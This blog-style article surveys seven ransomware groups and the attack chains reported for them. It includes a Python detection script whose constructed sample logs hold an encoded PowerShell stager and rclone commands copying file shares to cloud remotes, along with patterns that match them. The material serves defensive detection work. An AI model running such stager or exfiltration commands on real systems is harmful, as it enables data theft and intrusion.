Several of the largest and most infamous ransomware organizations vanished after a run of high-profile attacks in the middle of this year.
Ransomware attacks by the Russian-language groups Conti against Ireland’s health service, DarkSide against Colonial Pipeline in the United States, and REvil against meat-processing giant JBS and remote-management software vendor Kaseya prompted the Biden administration, beginning in May, to try to disrupt the ransomware business model more effectively. The White House has warned Russia that if it does not act against ransomware-wielding criminals operating inside its borders, the US reserves the right to do so itself.
DarkSide and REvil vanished quickly, as did Avaddon, with security experts suggesting the operators were running for cover. All three were ransomware-as-a-service operations: the operators build the crypto-locking malware and supply it to affiliates, effectively self-employed contractors, who carry out the intrusions. When a victim pays, affiliate and operator split the proceeds according to a predetermined formula.
At least, that’s how it works in theory. A security firm recently found a newly posted leak in which a dissatisfied Conti affiliate, complaining that he was being underpaid, released the operation’s training manuals and technical guidelines.
The Emergence of New and Reinvented Operations
Given the tremendous profits that ransomware currently offers, and the fact that many enterprises remain poorly defended, many security experts expect the key operators behind Avaddon, DarkSide, and REvil simply to rebrand. Meanwhile, affiliates often work with several ransomware operations, sometimes at the same time. So even though individual groups appear to come and go, the ransomware business model continues to thrive.
New ransomware gangs keep emerging. In recent weeks, law enforcement officials and information security specialists have tracked increased activity from lesser-known players, including the launch of new operations. All of them practice double extortion: they claim to have stolen data before crypto-locking systems, then threaten to publish it on a data-leak site unless the victim pays.
ALTDOS, AvosLocker, Hive, HelloKitty, LockBit 2.0, and OnePercent Group, as well as the DarkSide spinoff BlackMatter, are the seven operations detailed below.
- ALTDOS
Background – ALTDOS first appeared in late 2020, when it claimed its first victim, a Thai securities trading firm. Since then it has claimed a number of victims in Bangladesh, Singapore, and Thailand, targeting enterprises in Southeast Asia and Bangladesh for financial gain.
Since its inception in December, the ALTDOS cybercrime operation has continued to target firms in Bangladesh, Singapore, and Thailand, according to a joint advisory from Singapore’s Cyber Security Agency, police force, and Personal Data Protection Commission.
The advisory says it is presently uncertain which ransomware strain ALTDOS uses. ALTDOS will… approach the victim using a ProtonMail-hosted email account, demanding payment or the exfiltrated data will be exposed, it states.
If the victim does not reply or comply with the ransom demand within the specified time limit, ALTDOS may launch a distributed denial-of-service attack on the victim’s internet-facing systems to disrupt operations and press for payment, the advisory continues.
ALTDOS, like the gangs above, extorts victims not only with the promise of a decryption tool but also with a guarantee that data stolen before systems were crypto-locked will be deleted. In some cases, according to the advisory, the group has demanded a ransom in exchange for a decryptor rather than for a pledge to destroy stolen data.
- AvosLocker
When AvosLocker was first spotted in June, researchers said the operation appeared to be focusing on smaller law firms, as well as freight, logistics, and real estate companies, in the United States, the United Kingdom, and parts of Europe. Towards the end of last month the operation was still recruiting affiliates, for example through spam adverts pushed over Jabber and Telegram.
Recently, AvosLocker’s Tor-based data-leak site listed 11 victims, including Moorfields Eye Hospitals UAE, part of the British National Health Service’s Moorfields Eye Hospital Foundation Trust, from which the group claims to have stolen more than 60GB of data. The incident has been acknowledged, although not publicly attributed to the group.
According to researchers, AvosLocker, like many of its competitors, promises affiliates technical support to help victims recover after an attack, and markets its encryption software as ‘fail-proof,’ with low detection rates and the ability to handle very large files. Researchers have seen initial ransom demands ranging from $50,000 to $75,000.
- Hive
According to researchers, the Hive ransomware was first spotted on June 26 by the self-described “ransomware hunter” behind the @fbgwls245 Twitter account, who discovered the group’s malicious executable after it was uploaded to the VirusTotal malware-scanning service.
Hive’s data-leak site currently lists 34 victims. “Hive employs all extortion methods available to put pressure on the victim, including the date of initial compromise, a countdown, the date the leak was actually exposed on their site, and even the ability to post the disclosed leak on social media,” researchers stated.
A threat researcher bemoaned the code’s poor quality, noting that Hive samples seen so far employed “an absurd and unprofessional cryptographic method in which 100 RSA keys of varied bit sizes are used to encrypt files,” which would make recovery difficult. (Competently built ransomware encrypts file contents with a fast symmetric cipher and uses RSA only to wrap the per-file keys; applying RSA directly to file data is slow and error-prone.)
- HelloKitty
HelloKitty ransomware attacks were first observed in early 2020. In April, it was reported that HelloKitty-wielding attackers were targeting unpatched SonicWall SMA 100 Series secure access gateways. The vendor confirmed a zero-day vulnerability in the devices, CVE-2021-20016, on Jan. 23 and patched it on Feb. 23.
In July, researchers reported “a Linux form of HelloKitty targeting VMware’s ESXi hypervisor, which is extensively used in cloud and on-premises data centers.” ESXi was most likely targeted because of the enormous ransoms that can be demanded when attackers successfully crypto-lock these systems. The researchers added that HelloKitty-wielding attackers had demanded as much as $10 million, but had received only three large ransoms, totaling $1.5 million.
- LockBit 2.0
LockBit, formerly known as ABCD ransomware, has been operating since September 2019, although the operation only recently introduced malware branded LockBit 2.0. Accenture is one of its most recent victims.
According to security researchers, LockBit 2.0 boasts of having one of the fastest and most efficient encryption routines in today’s ransomware landscape.
A spokesman for the group, who uses the handle “LockBitSupp,” recently gave an interview to the Russian OSINT YouTube channel extolling the virtues of his affiliate program, which he claims pays 80% of every ransom to the affiliate responsible, in an apparent bid to raise the group’s profile and attract new affiliates. According to LockBitSupp, the operators continue to enhance the malware and supporting tools to make attacks not only faster but also more automated, including exfiltrating data and uploading it to the group’s data-leak site.
The LockBit 2.0 leak site had 64 victims as of last week, some of whom had already had their stolen information published and others for whom a countdown timer was still running.
- OnePercent Group
The FBI issued a flash alert on the OnePercent Group, warning that it has been operating since November 2020 and infects victims with the IcedID, aka BokBot, banking Trojan via phishing attacks. The phishing emails carry zip files containing a Microsoft Word or Excel document with a malicious macro that installs the malware, which in turn drops and runs the Cobalt Strike penetration-testing tool.
The attackers move laterally across the network using PowerShell scripting and use the Rclone tool to exfiltrate data to cloud storage before deploying their crypto-locking malware on every reachable target, according to the FBI.
“The perpetrators were seen on the victim’s network for about one month prior to the ransomware’s deployment,” according to the FBI.
“The victim will then begin to receive phone calls from spoofed phone numbers with ransom demands, as well as a ProtonMail email address for further communication,” according to the FBI. “The actors will insist on speaking with a victim company’s designated negotiator or otherwise threaten to disclose the stolen material,” says the report.
The FBI says the gang has previously threatened to sell stolen data to the REvil, aka Sodinokibi, group if victims fail to pay.
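The FBI’s description of the OnePercent Group chain (macro-laden Office attachment, IcedID, Cobalt Strike, PowerShell lateral movement, Rclone exfiltration to cloud storage, then ransomware) maps directly onto process-creation telemetry. The following is an added example, not code from the FBI alert, eScan or any vendor: a small set of detection rules run over constructed Sysmon-style process-creation events. Hostnames, paths, the encoded payload and the remote names are invented; the field names follow Sysmon Event ID 1 but are assumptions, and the rclone version-info description the renamed-binary check keys on is taken from the public rclone build.

```python
"""Detection rules for the OnePercent Group intrusion chain the FBI describes:
macro-laden Office attachment -> IcedID -> Cobalt Strike -> PowerShell lateral
movement -> Rclone exfiltration to cloud storage -> ransomware deployment.

Added example, not code from the FBI alert or any vendor. Events below are
constructed Sysmon-style process-creation records (Event ID 1) trimmed to the
fields the rules use; hostnames, paths and payloads are invented.
"""
import json
import re
from typing import Dict, Iterable, List, Optional, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# 40+ base64 characters after -e/-ec/-enc/-EncodedCommand: longer than a benign one-liner.
ENCODED_PS = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{40,}", re.I)
PS_REMOTING = re.compile(r"(?:Invoke-Command|Enter-PSSession)\b.*-ComputerName", re.I)
# rclone addresses destinations as <remote>:<path>. The remote name is arbitrary, so
# match the syntax (2+ chars before the colon) instead of guessing provider names;
# a single letter followed by ":\" is a Windows drive, not a remote.
RCLONE_REMOTE = re.compile(r"\s[A-Za-z0-9_-]{2,}:(?:[^\s\\]|$)")
RCLONE_VERBS = re.compile(r"\b(?:copy|sync|move|copyto|moveto)\b", re.I)

Finding = Tuple[str, str, str]  # (kill-chain stage, ATT&CK technique, description)


def _base(path: str) -> str:
    """Lower-case file name of an Image/ParentImage path, whichever separator is used."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def rule_office_spawns_script(ev: dict) -> Optional[Finding]:
    """Macro execution: an Office application spawning a script host or LOLBin."""
    if _base(ev.get("ParentImage", "")) in OFFICE_APPS and _base(ev["Image"]) in SCRIPT_HOSTS:
        return ("execution", "T1204.002", "Office application spawned a script host (macro)")
    return None


def rule_powershell_encoded(ev: dict) -> Optional[Finding]:
    """Typical Cobalt Strike stager: PowerShell with a long -EncodedCommand."""
    if _base(ev["Image"]) in POWERSHELL and ENCODED_PS.search(ev.get("CommandLine", "")):
        return ("execution", "T1059.001", "PowerShell launched with a long encoded command")
    return None


def rule_powershell_remoting(ev: dict) -> Optional[Finding]:
    """Lateral movement over PowerShell remoting, seen from either end of the session."""
    if _base(ev["Image"]) in POWERSHELL and PS_REMOTING.search(ev.get("CommandLine", "")):
        return ("lateral_movement", "T1021.006", "PowerShell remoting to another host")
    if _base(ev.get("ParentImage", "")) == "wsmprovhost.exe":
        return ("lateral_movement", "T1021.006", "process spawned by the WinRM provider host")
    return None


def rule_rclone_cloud_copy(ev: dict) -> Optional[Finding]:
    """Exfiltration: rclone copying to a cloud remote, even if the binary was renamed.
    A renamed rclone still carries its version-info description ("Rsync for cloud storage")."""
    cl = ev.get("CommandLine", "")
    is_rclone = (_base(ev["Image"]) == "rclone.exe"
                 or "rsync for cloud storage" in ev.get("Description", "").lower())
    if is_rclone and RCLONE_VERBS.search(cl) and RCLONE_REMOTE.search(cl):
        return ("exfiltration", "T1567.002", "rclone copying data to a cloud remote")
    return None


RULES = [rule_office_spawns_script, rule_powershell_encoded,
         rule_powershell_remoting, rule_rclone_cloud_copy]


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Run every rule over each JSON-lines event and return one record per hit."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = json.loads(line)
        for rule in RULES:
            hit = rule(ev)
            if hit:
                stage, technique, text = hit
                findings.append({"host": ev.get("Computer", "?"), "time": ev.get("UtcTime", "?"),
                                 "image": ev["Image"], "stage": stage,
                                 "technique": technique, "text": text})
    return findings


def covers_full_chain(findings: List[Dict[str, str]]) -> bool:
    """True once execution, lateral movement and exfiltration have all been seen.
    The FBI reports about a month of dwell time, so correlate on stage rather than
    a short time window: the macro and the rclone run may be weeks apart."""
    return {"execution", "lateral_movement", "exfiltration"} <= {f["stage"] for f in findings}


# Constructed sample telemetry (not real logs). Two benign lines (browser launch,
# scheduled backup script) are included to show the rules stay quiet on them.
SAMPLE_EVENTS = r"""
{"UtcTime":"2021-07-01 09:12:04","Computer":"WS-042","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c rundll32 C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.dll,update"}
{"UtcTime":"2021-07-01 09:12:31","Computer":"WS-042","ParentImage":"C:\\Windows\\System32\\rundll32.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"}
{"UtcTime":"2021-07-19 22:40:10","Computer":"WS-042","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -NoProfile -Command \"Invoke-Command -ComputerName FILESRV01 -ScriptBlock { Get-ChildItem D:\\share }\""}
{"UtcTime":"2021-07-28 03:05:44","Computer":"FILESRV01","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\ProgramData\\rclone.exe","Description":"Rsync for cloud storage","CommandLine":"rclone.exe copy D:\\share\\finance mega:finance --transfers 16 -q"}
{"UtcTime":"2021-07-28 08:00:00","Computer":"WS-042","ParentImage":"C:\\Windows\\explorer.exe","Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","CommandLine":"chrome.exe"}
{"UtcTime":"2021-07-28 23:00:00","Computer":"FILESRV01","ParentImage":"C:\\Windows\\System32\\svchost.exe","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","CommandLine":"powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}
{"UtcTime":"2021-07-29 02:11:09","Computer":"FILESRV01","ParentImage":"C:\\Windows\\System32\\cmd.exe","Image":"C:\\ProgramData\\svchost.exe","Description":"Rsync for cloud storage","CommandLine":"svchost.exe sync D:\\share\\hr pcloud:hr --config C:\\ProgramData\\r.conf"}
"""

if __name__ == "__main__":
    hits = scan(SAMPLE_EVENTS.splitlines())
    for h in hits:
        print(f'{h["time"]} {h["host"]:<10} {h["technique"]:<10} {h["text"]}')
    print("full chain observed:", covers_full_chain(hits))
```

On the sample telemetry the rules fire five times (macro, encoded PowerShell, remoting, two rclone runs, one of them under a renamed binary) and stay quiet on the browser launch and the scheduled backup script. The point of `covers_full_chain` is that with a month of dwell time, as the FBI reports, the stages arrive far apart; correlating on stage per environment rather than inside a short window is what lets the rclone run be recognised as the tail of the same intrusion.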
- BlackMatter
In late July, a member using the handle “BlackMatter” on a cybercrime forum announced the birth of a new operation that “combined the greatest elements of DarkSide, REvil, and LockBit into itself.”
“I am confident that we are dealing with a DarkSide branding here,” a ransomware expert said after evaluating a BlackMatter decryptor found in the wild. Separately, a blockchain analysis firm has examined the cryptocurrency wallets used by BlackMatter and concluded that it is a rebrand of DarkSide.
As a result, predictions that ransomware operators would simply change their names appear to have come true. “We’ve known for 50 years that hacking is an addictive behavior,” says William Hugh Murray, an information security veteran. “Expecting reform is naïve. Reform or retirement are significantly less likely than rebranding.”
To read more, please check eScan Blog